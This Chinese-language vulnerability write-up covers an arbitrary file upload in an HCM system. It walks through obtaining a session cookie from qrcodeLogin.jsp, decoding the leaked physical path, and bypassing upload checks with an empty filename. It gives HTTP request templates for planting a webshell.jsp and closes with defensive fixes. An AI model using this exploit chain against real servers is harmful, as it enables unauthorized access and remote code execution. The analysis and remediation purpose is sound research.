HCM系统文件上传漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>

本漏洞存在于某HCM系统中，通过三个关键步骤实现任意文件上传：<\/p>

获取有效会话Cookie<\/li>
获取系统物理路径<\/li>

利用文件上传接口绕过安全限制上传任意文件<\/li> <\/ol>

漏洞详细分析<\/h2>

1. 获取有效会话Cookie<\/h3>

接口路径<\/strong>：\/hrm\/web\/pub\/qrcodeLogin.jsp<\/code><\/p>

漏洞原理<\/strong>：<\/p>

该JSP文件实例化了一个用户名为"二维码进入"的userView对象<\/li> 设置session的islogon属性为true，使会话生效<\/li> 直接访问该接口即可获得一个已登录状态的Cookie<\/li> <\/ul> 关键代码<\/strong>：<\/p> \/\/ 实例化userView userView.setSomeProperties(); session.setAttribute("islogon", true); \/\/ 关键点：强制设置登录状态 <\/code><\/pre> 2. 获取系统物理路径<\/h3> 接口路径<\/strong>：\/hrm\/uploadLogo.do<\/code><\/p> 漏洞原理<\/strong>：<\/p> 系统使用Struts框架，在配置文件中映射到特定JSP<\/li> JSP中定义了projectpath<\/code>参数，其值为getProjectPath()<\/code><\/li> 该方法返回系统images目录的物理路径<\/li> 路径使用SafeCode.encode<\/code>进行编码<\/li> <\/ul> 编码规则分析<\/strong>：<\/p> ASCII值>255的字符：用0填充到4位<\/li> 前面添加"^"<\/li> <\/ul> <\/li> '0'-'9'、'A'-'Z'、'a'-'z'之外的常见字符： ASCII编码，用0填充到2位<\/li> 前面添加"~"<\/li> <\/ul> <\/li> 数字和字母不进行编码<\/li> <\/ol> 3. 文件上传漏洞<\/h3> 接口路径<\/strong>：\/hrm\/uploadLogo.do?b_upload=1<\/code><\/p> 上传流程<\/strong>：<\/p> 获取type参数（可选）<\/li> 从请求体中获取三个上传文件字段：logofile<\/code>、twoFile<\/code>、oneFile<\/code><\/li> 获取path参数并使用SafeCode.decode<\/code>解码<\/li> 调用uploadFile<\/code>方法上传文件<\/li> <\/ol> 安全限制与绕过<\/strong>：<\/p> 正常情况下有四个校验：<\/p> 文件名不允许包含~\/<\/code>和..\/<\/code><\/li> 文件后缀不能为空<\/li> 文件内容与后缀匹配校验（通过文件头检查）<\/li> 后缀名白名单检查<\/li> <\/ol> <\/li> 绕过方法：<\/p> 当filename<\/code>为空时，直接使用path<\/code>参数作为完整路径<\/li> 全局文件上传校验Servlet只检查filename<\/code>不为空的请求<\/li> 因此在path<\/code>中拼接文件名并置空filename<\/code>可绕过所有检查<\/li> <\/ul> <\/li> <\/ul> 文件路径构造<\/strong>：<\/p> 使用File<\/code>类的第三个构造方法：File(String path, String filename)<\/code><\/li> 当filename<\/code>为空时，直接使用path<\/code>作为完整路径<\/li> 可在path<\/code>中拼接任意文件名和路径<\/li> <\/ul> 漏洞利用步骤<\/h2> 1. 获取有效Cookie<\/h3> GET \/hrm\/web\/pub\/qrcodeLogin.jsp HTTP\/1.1 Host: target.com <\/code><\/pre> 响应中会返回有效的会话Cookie。<\/p> 2. 获取系统物理路径<\/h3> GET \/hrm\/uploadLogo.do HTTP\/1.1 Host: target.com Cookie: [获取的Cookie] <\/code><\/pre> 响应中包含编码后的物理路径，需要使用SafeCode.decode<\/code>解码。<\/p> 3. 上传任意文件<\/h3> POST \/hrm\/uploadLogo.do?b_upload=1 HTTP\/1.1 Host: target.com Cookie: [获取的Cookie] Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="path" [解码后的物理路径]~5cwebshell.jsp ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="logofile"; filename="" Content-Type: application\/octet-stream [webshell内容] ------WebKitFormBoundaryABC123-- <\/code><\/pre> 关键点<\/strong>：<\/p> filename<\/code>必须为空<\/li> path<\/code>参数包含完整路径和文件名<\/li> 路径分隔符使用编码形式（如~5c<\/code>代表\<\/code>）<\/li> <\/ul> 防御建议<\/h2> 修复qrcodeLogin.jsp<\/code>的会话认证逻辑<\/li> 文件上传接口增加对filename<\/code>为空的检查<\/li> 对path<\/code>参数进行严格过滤，禁止包含文件名<\/li> 统一文件上传校验逻辑，无论filename<\/code>是否为空都进行检查<\/li> 限制上传目录为特定非可执行目录<\/li> 实施文件内容校验而不仅依赖后缀名检查<\/li> <\/ol> 附录：SafeCode编解码参考<\/h2> 编码规则<\/h3> ^<\/code>前缀：ASCII>255的字符，填充到4位<\/li> ~<\/code>前缀：特殊字符的ASCII码，填充到2位<\/li> 数字字母：不编码<\/li> <\/ul> 示例<\/h3> \<\/code> → ~5c<\/code><\/li> \/<\/code> → ~2f<\/code><\/li> 非ASCII字符：^xxxx<\/code>格式<\/li> <\/ul> 通过理解这些关键点，安全研究人员可以复现该漏洞，而开发人员则可以针对性地修复这些安全问题。<\/p>